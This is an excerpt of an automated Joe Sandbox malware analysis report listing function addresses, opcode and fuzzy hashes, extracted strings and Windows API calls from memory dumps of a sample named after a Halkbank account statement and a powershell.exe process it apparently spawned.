Opcode ID: ac2da2b6533242e228e5bc8fe6318b3943c1dac6843dc0e9b5b9f90667a9d915
Instruction ID: 7b83cf06ee03654f5262d485384f30b6a60d27b8547eb2ccc7c10d3903610086
Opcode Fuzzy Hash: ac2da2b6533242e228e5bc8fe6318b3943c1dac6843dc0e9b5b9f90667a9d915
Instruction Fuzzy Hash: 36A02220A0B0803BCFB28B200C8C388FF003C02300308A3C8800C83023C3208003C383

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E61539 Relevance: 17.3, Strings: 12, Instructions: 2266COMMON

Download Yara Rule

Strings

#fr, xrefs: 00E62DCA
Cvr&, xrefs: 00E626B4
#%f, xrefs: 00E63952
*T:O, xrefs: 00E61F70
T3i, xrefs: 00E634E3
i, xrefs: 00E63BBF
XL=, xrefs: 00E616BA
sJ!g, xrefs: 00E63986
vtFp, xrefs: 00E62172
yR, xrefs: 00E633AB
]V|N, xrefs: 00E622DB
[Yp{, xrefs: 00E61E3B

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: yR$#%f$#fr$*T:O$Cvr&$T3i$XL=$[Yp{$]V|N$sJ!g$vtFp$i
API String ID: 0-3776435289
Opcode ID: 23c84c76fe62de4f83b9cec02762b0ed7a7f3ed07a6cc7ae5397f333a43b05f7
Instruction ID: 76f7099a158ba097c3057f4153f974d2f7a612f9c1abefb1688c1d8c78035f8f
Opcode Fuzzy Hash: 23c84c76fe62de4f83b9cec02762b0ed7a7f3ed07a6cc7ae5397f333a43b05f7
Instruction Fuzzy Hash: 1343B335D5062B8ACB119F60C9547C9F372BFAA304F219786A9483B150EB713BDACF91

Uniqueness

Uniqueness Score: -1.00%

Function 05E9C4B8 Relevance: 1.6, Strings: 1, Instructions: 376COMMON

Download Yara Rule

Strings

Xc#m, xrefs: 05E9C690

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: Xc#m
API String ID: 0-3905349548
Opcode ID: dd4f95cdc332e49c1b912580e55217abcc1458abafdb2acfa7bd7559b6374316
Instruction ID: f873bcefb7ddeb829c0de8d8f0b2a19e80463f8ec54e7b5c319654ef68ff965e
Opcode Fuzzy Hash: dd4f95cdc332e49c1b912580e55217abcc1458abafdb2acfa7bd7559b6374316
Instruction Fuzzy Hash: 0AE13B74A00605CFDB18EF68C594AADB7F2BF88304F25D4A9D5899B366DB30EC81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB13D0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

, xrefs: 05DB166A

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a6ceb35fc631f8b949ff44115487f41a70299efe240363197f245c5e767dd0ad
Instruction ID: cce9b80d1a0aa44796a9ba31091d77cc151757c1ae945b000049c492893e0b1a
Opcode Fuzzy Hash: a6ceb35fc631f8b949ff44115487f41a70299efe240363197f245c5e767dd0ad
Instruction Fuzzy Hash: E991DD31F18214CFEB10DAA8DC909EAB7B3ABC1214F29857BC557CB605D671D906C792

Uniqueness

Uniqueness Score: -1.00%

Function 05DB6720 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c18ab7fe34590da315b62ac62a7fb3605ff8d2861c986a9eab5643628f1165
Instruction ID: e58fffdaf155bdbe564c75eb4e6bd68017809a9311443988b1b8b139c32b07b1
Opcode Fuzzy Hash: 05c18ab7fe34590da315b62ac62a7fb3605ff8d2861c986a9eab5643628f1165
Instruction Fuzzy Hash: 83F11771E04119CFDB14CFA9C880AEDB7F7BB88310F2A8526E81AAB255D6B5DC41CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05DB085B Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cbd6679e971ae0d5291daaf1c5c04142ea0ffbf10c9b029af52f2cc2eef39ed
Instruction ID: 2b7189897d4fd2041ed6aed773e8b319424760ddaf672cf78e785f3a8864c62f
Opcode Fuzzy Hash: 0cbd6679e971ae0d5291daaf1c5c04142ea0ffbf10c9b029af52f2cc2eef39ed
Instruction Fuzzy Hash: BEE19E70E04258CFDB14CB68C884AEEBBF3BF88304F19C59AD456EB256D774A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB0950 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e51576d7185c93f57b45098d8262694fc2f875d3f9538fea54b72ef26644596
Instruction ID: 4cf016f71b89c7bfc3f29be2801745e87517bdc8b5a52f927131de412eab6420
Opcode Fuzzy Hash: 8e51576d7185c93f57b45098d8262694fc2f875d3f9538fea54b72ef26644596
Instruction Fuzzy Hash: 11914A70E04259CFDB14CBA9C884AEEB7B3FF88304F29C559D406AB249D774A986CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB0FDA Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71f4740224891703a14a55041dd163fc64fd0d4bf3a3e98eb57efed0d798d763
Instruction ID: cc4df8663fc7902f847a087dbed2fe95e8b02bb18fe0c0b710856f32055ec294
Opcode Fuzzy Hash: 71f4740224891703a14a55041dd163fc64fd0d4bf3a3e98eb57efed0d798d763
Instruction Fuzzy Hash: DC615D32F141148BD714DBA9DC94B9EB3E3AFC8614F2A8565E406DB799DB74AC02CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05DB045B Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc3a2e657f08307a23be7e34896996bb005d1de8c9c334db4a6a2b3b20891bab
Instruction ID: 3728ba279226f27d81b794570665dc1ab19e6f7f34ed310c2e6311504e7b4e33
Opcode Fuzzy Hash: fc3a2e657f08307a23be7e34896996bb005d1de8c9c334db4a6a2b3b20891bab
Instruction Fuzzy Hash: 50416879E5111ACFDF14CFA9E881AEEB7F2BF48300F44E219E016EB281DA359944CB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4744, Parent PID: 3496COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	83
Total number of Limit Nodes:	3

Executed Functions

Function 005B5D68 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55490963a4f84d202b4c3ae27a0192fb6de19d0d16d412957f1209b5bdf253a8
Instruction ID: 1fcaacbcd615b1cbb2387f7251564ff761f41721bada54a996378fa76c882290
Opcode Fuzzy Hash: 55490963a4f84d202b4c3ae27a0192fb6de19d0d16d412957f1209b5bdf253a8
Instruction Fuzzy Hash: AAD1C074A003489FCB08DBB5C8596AEBBB6EF85304F14846AE905DB390EF34ED06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 005B7C60 Relevance: 1.6, Strings: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x, xrefs: 005B8130

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 75e0d336a09f04ec60ace018f26aa50d85e7134f54f85700539ca9589b9c3791
Instruction ID: da8cea15688f2852930bbd4376b31898cf77e836a058fb73afea279f85e2eeec
Opcode Fuzzy Hash: 75e0d336a09f04ec60ace018f26aa50d85e7134f54f85700539ca9589b9c3791
Instruction Fuzzy Hash: EDE15934B042088FDB54DB78C454AAEBBF6AF88354F158469DA06EB390DF35ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005E12FC Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 005EE87A

Memory Dump Source

Source File: 00000001.00000002.809332278.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5e0000_powershell.jbxd

Similarity

API ID: AuthzCodeIdentifyLevel
String ID:
API String ID: 1431151113-0
Opcode ID: 1ffd7a294d88bbc7a672675e2e02377a3c9fb366179967998670e0846ccbe0a8
Instruction ID: e610a7456ee0dd972075a4c2dac1c8a91bc9e92b51526d0d95bb8dba8f59d8b8
Opcode Fuzzy Hash: 1ffd7a294d88bbc7a672675e2e02377a3c9fb366179967998670e0846ccbe0a8
Instruction Fuzzy Hash: CA41C470900269CFEB24CF9AC985BDABBB5BB48304F1085EAD44DB7250D7755E89CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005EE75C Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 005EE87A

Memory Dump Source

Source File: 00000001.00000002.809332278.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5e0000_powershell.jbxd

Similarity

API ID: AuthzCodeIdentifyLevel
String ID:
API String ID: 1431151113-0
Opcode ID: 399dbb19be4eca35e3fd528215f5ea47298a9a7799ef66928f3e649ccb120ecd
Instruction ID: 4bf6ebe3cc556489232ca7d47f78532f05160f2a1d5c500acf539df4e2032238
Opcode Fuzzy Hash: 399dbb19be4eca35e3fd528215f5ea47298a9a7799ef66928f3e649ccb120ecd
Instruction Fuzzy Hash: 1941C5709002A9CFEB24CF59C985BDDBBB5BB48304F1085EAD44DB7250D7755A89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 076C6808 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.811902069.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: a25d9bc6d2b1a9774787ffbb438ff56db7b51ac35c357efac69cadb72b96e0b6
Instruction ID: ef4e49415ebbf8f5cd2e6d5dfced87bbef1f734d17848824ccde3f65273ba2e9
Opcode Fuzzy Hash: a25d9bc6d2b1a9774787ffbb438ff56db7b51ac35c357efac69cadb72b96e0b6
Instruction Fuzzy Hash: 0B319CB19043498FCB00DFA9C8487EEBBF6EF89310F14846AD459E7380DB389945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 076C57F4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 076C68EB

Memory Dump Source

Source File: 00000001.00000002.811902069.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 8952d55845c5b67bdb877e64da4c113e8b5ac1986fe8b10fda8cf60e5d5c9a1d
Instruction ID: 14670ee49cda6dc46a3576915e2306af8e9c8945e6398a88bbbedf9c1c70617e
Opcode Fuzzy Hash: 8952d55845c5b67bdb877e64da4c113e8b5ac1986fe8b10fda8cf60e5d5c9a1d
Instruction Fuzzy Hash: 91216AB5D0021A8FDB10CFAAC844BEEBBF5EF88314F158469D459A7340DB78A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 076C01B8 Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,076C09A7,00000000,00000000,00000003,00000000,00000002), ref: 076C1142

Memory Dump Source

Source File: 00000001.00000002.811902069.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 155fb21ab4cabf1d2b0626361930c556eb86b27b242e6f263d35c339bf97bd89
Instruction ID: 99c12ca2a4d36e81972dd84ff95e5ce4d5d5c76274629f9083da5f95cdb3b709
Opcode Fuzzy Hash: 155fb21ab4cabf1d2b0626361930c556eb86b27b242e6f263d35c339bf97bd89
Instruction Fuzzy Hash: E72128B590065DAFCF10CF9AD844ADEFBB4FB09310F148519E915A7600C774A954CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 005EFBD9 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 005EFC56

Memory Dump Source

Source File: 00000001.00000002.809332278.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5e0000_powershell.jbxd

Similarity

API ID: AccessAuthzCodeComputeFromLevelToken
String ID:
API String ID: 132034935-0
Opcode ID: 4d2862fe0d5cd1ae1c7aec57fff99ad8d0814628db534a290a1d7e4cee2f7603
Instruction ID: b304a90efe20af6a2e04ff9e66bd95edbc4cdbafe5ff7dc61fa6f90d7cd4e179
Opcode Fuzzy Hash: 4d2862fe0d5cd1ae1c7aec57fff99ad8d0814628db534a290a1d7e4cee2f7603
Instruction Fuzzy Hash: C42138B59002499FCB10CF9AC884BDEBBF5FF48310F148429E868A7240D778AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E1308 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 005EFC56

Memory Dump Source

Source File: 00000001.00000002.809332278.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5e0000_powershell.jbxd

Similarity

API ID: AccessAuthzCodeComputeFromLevelToken
String ID:
API String ID: 132034935-0
Opcode ID: 3d8f979cd1dc36a20e12b17216f03a1ab77daacb30eba49ecd1796abd995b550
Instruction ID: 3b44cdc00381a05b31e503fab6335261773c12b2b9b07de2999d195cc977e7c5
Opcode Fuzzy Hash: 3d8f979cd1dc36a20e12b17216f03a1ab77daacb30eba49ecd1796abd995b550
Instruction Fuzzy Hash: 392127B59007499FCB10CF9AC484BDEBBF5FB48310F148429E969A7240D778A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005B6738 Relevance: 1.3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8^#m, xrefs: 005B6750

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID: 8^#m
API String ID: 0-4283655788
Opcode ID: 81ff12f8e96bfe713ec9fc88c4b24bf8e4f3262bede4dd6f1b39ab280569760f
Instruction ID: ae083be6b21f193553a16724052129349311c2ad5b526d527b29ab18e3f87375
Opcode Fuzzy Hash: 81ff12f8e96bfe713ec9fc88c4b24bf8e4f3262bede4dd6f1b39ab280569760f
Instruction Fuzzy Hash: A1F08236344565079A1562BE74106AEA7CFCBC5676F1D0076E60DCB381EF55CC0283F6

Uniqueness

Uniqueness Score: -1.00%

Function 005B6728 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8^#m, xrefs: 005B6750

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID: 8^#m
API String ID: 0-4283655788
Opcode ID: 3fc2c89079ae72d7350d126f7555f52881325d10f340b2775487730cc0a13490
Instruction ID: 9d0ee4fdabdf887a31dfa512f9a0499be826b7aa4bb64dde029c44e93d0cd3a5
Opcode Fuzzy Hash: 3fc2c89079ae72d7350d126f7555f52881325d10f340b2775487730cc0a13490
Instruction Fuzzy Hash: 13E0D83530C2904BC32657AD686069ABFDA8FC6550B1D407AE589C7253EF548C1683E7

Uniqueness

Uniqueness Score: -1.00%

Function 005B9E89 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b7ce37d59922194678a22d4acfe746db7ab87390f331cee51326eb4e69ed52
Instruction ID: 24e580ae061965243ca37a8e6186c935235e4572257b79bc661b97b964bcab72
Opcode Fuzzy Hash: 10b7ce37d59922194678a22d4acfe746db7ab87390f331cee51326eb4e69ed52
Instruction Fuzzy Hash: BF020B34A00219CFCB14DFA4D894AADBBB6FF89305F208569E519AB365DB35EC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005B37C0 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e9a2fe9eb0a84f2c3cfd8c08102bfb7a69cb692aab55271c135839cf186334
Instruction ID: 8dfa4593f3ba15b54e21c89b80214c7edd722801209d6ec9d8c7a123d726961c
Opcode Fuzzy Hash: 81e9a2fe9eb0a84f2c3cfd8c08102bfb7a69cb692aab55271c135839cf186334
Instruction Fuzzy Hash: 5CE17334740300AFDB64DB64D885FAE77A6EF84710F104869F606AF3D0DAB6AD818B91

Uniqueness

Uniqueness Score: -1.00%

Function 005B7508 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bcf0b824321e6a1a64e59b725403c4193b6b05180e27c9b338dd79b25e99c70
Instruction ID: 013aa5726bbf8f268de2963e0ff362505abd8a6127f6365d8cf19eb9a6ee8056
Opcode Fuzzy Hash: 1bcf0b824321e6a1a64e59b725403c4193b6b05180e27c9b338dd79b25e99c70
Instruction Fuzzy Hash: 78E16934B142089FDB14DB64C884BAEBBF6FFC8314F158469E905AB395DB74AC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005BDE50 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed16a822aa867eb18ca6ae7f32fd379926d1aff180c6ca4881e0bf8b16e70812
Instruction ID: 172d41a6e0dc9b3e1da74e85c9de509a7222cdd2e6de61678eb2b639ee5e2bb0
Opcode Fuzzy Hash: ed16a822aa867eb18ca6ae7f32fd379926d1aff180c6ca4881e0bf8b16e70812
Instruction Fuzzy Hash: C1F12E74A00208DFCB04DFA4D995AEDBBF6FF88304F148469E906AB365DB71AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005B8208 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04524f46c22fa6a6fc016787fd6a356e7fa0677d9e393bed6fe3a7dfdb114aba
Instruction ID: 08549add3928085dfa357279d83e9cd23192538b9572f7fa6c0b2d1dd912eecc
Opcode Fuzzy Hash: 04524f46c22fa6a6fc016787fd6a356e7fa0677d9e393bed6fe3a7dfdb114aba
Instruction Fuzzy Hash: 94D16C70A00209DFDB14DF65C984AEEBBFABF48304F148869E915EB291DB75ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005B67B0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136e8429cc349bc613e9e8be2aaa026b9d68693317dc64b9762d0c6b0279e661
Instruction ID: 1b82fb929bcf2c3aa0b2e1370e9aa8ad0a91c81fc1d5415199768fb2b6fdab5e
Opcode Fuzzy Hash: 136e8429cc349bc613e9e8be2aaa026b9d68693317dc64b9762d0c6b0279e661
Instruction Fuzzy Hash: B4915934A002059FCB04DBA4D895AAEBBF2FF88300F148469E546DB3A5DF34ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005B8B68 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099ceacbd507e9ead1d9393427858a02cb5cfa3872412d8133d36e387f92bd66
Instruction ID: c3648d8aa97b09445ee32e9deae7d56f383b349c20236002c51d7470f12c03a6
Opcode Fuzzy Hash: 099ceacbd507e9ead1d9393427858a02cb5cfa3872412d8133d36e387f92bd66
Instruction Fuzzy Hash: 6681D271E012498FCB15CFA4C8006EDBFB6FF85314F2985AAD505AB291DB31AD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005BCB47 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4767673e5faf87df43ec369bc99d7fa47a20e458259fc1516c3864ab3a9ac8ed
Instruction ID: 99c02597b897e1a855721c45b9a04e3b2162bea11648c942d19f039317a36be0
Opcode Fuzzy Hash: 4767673e5faf87df43ec369bc99d7fa47a20e458259fc1516c3864ab3a9ac8ed
Instruction Fuzzy Hash: 31911974A002099FCB14DFA4D958AEEBFF6FF88311F148429E816AB354DB74AD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 005B6E50 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e97436ece14c85049ee5276a1ec0847b67c5fcd6a9630d2686968f1cebfcf2f
Instruction ID: e5e0cd8f3df15e63339609b562391641795432a9f8b1e0a7cc182117c3e35872
Opcode Fuzzy Hash: 2e97436ece14c85049ee5276a1ec0847b67c5fcd6a9630d2686968f1cebfcf2f
Instruction Fuzzy Hash: D7612934A042199FDB14DBA4D968BAEBBB2FF88315F14842AD5069B394DF74AC45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 005B6E40 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279ef8243e5a8b9bac601997208c5bbac27a611e72d8f713a0dde49932726b96
Instruction ID: 8384432ac2829b18c3b1dc28cdb5f4073b8856783aa07726b0fa66725674f621
Opcode Fuzzy Hash: 279ef8243e5a8b9bac601997208c5bbac27a611e72d8f713a0dde49932726b96
Instruction Fuzzy Hash: 25615D34A042189FDB14DFA4D968AAEBBB2FF88310F148429D5069B394DF74FC45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 005B8B54 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead9876f26a974f4bb41f1453d709f8fffc61d5e43c4fb62d7f5556f3f1f88b7
Instruction ID: 291b3f08621b8018a543e8ba349a288c3c6398b29c874d9a9639f4c262a172fd
Opcode Fuzzy Hash: ead9876f26a974f4bb41f1453d709f8fffc61d5e43c4fb62d7f5556f3f1f88b7
Instruction Fuzzy Hash: D251BF72E01609CFCB15CFA4C8406EDBBB6FF95314F298659D9047B290DB71AE46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005B7C51 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f3d0c015f5b6cb5756c6322030fb7becae3aacc384ee5ff4f8630fcb82c26f
Instruction ID: 705f621591a92d75a1f1a52d2ee224f805d983b25b61da6204de04931d1efe95
Opcode Fuzzy Hash: b9f3d0c015f5b6cb5756c6322030fb7becae3aacc384ee5ff4f8630fcb82c26f
Instruction Fuzzy Hash: 14512934A042088FDB44DF78C454AEEBBF6BF88354F158469D901EB390DB71AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005B51C8 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

